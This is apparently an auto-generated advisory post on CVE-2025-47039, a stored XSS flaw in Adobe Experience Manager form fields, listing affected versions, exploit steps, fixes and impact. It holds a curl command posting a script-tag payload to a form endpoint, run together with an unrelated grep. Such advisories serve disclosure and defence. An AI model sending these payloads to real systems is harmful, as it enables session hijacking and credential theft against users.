Listen to this Post
How CVE-2025-47039 Works
Adobe Experience Manager (AEM) versions 6.5.22 and earlier contain a stored XSS vulnerability in form fields. A low-privileged attacker can inject malicious JavaScript payloads into vulnerable input fields. When other users access pages containing the compromised form data, the script executes in their browser session. The attack persists until the malicious content is removed, allowing session hijacking, defacement, or credential theft.
DailyCVE Form
Platform: Adobe Experience Manager
Version: ≤6.5.22
Vulnerability: Stored XSS
Severity: Medium
Date: 2025-06-10
Prediction: Patch by 2025-07-15
What Undercode Say
curl -X POST -d "input=<script>alert(1)</script>" http://aem-instance/formSubmit grep -r "unsanitized" /var/www/aem/components/
How Exploit
1. Authenticate with low-privilege account
2. Submit malicious script via form
3. Trigger execution via page visit
Protection from this CVE
1. Update to 6.5.23+
2. Input sanitization
3. CSP headers
Impact
1. Session hijacking
2. Data theft
3. UI manipulation
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
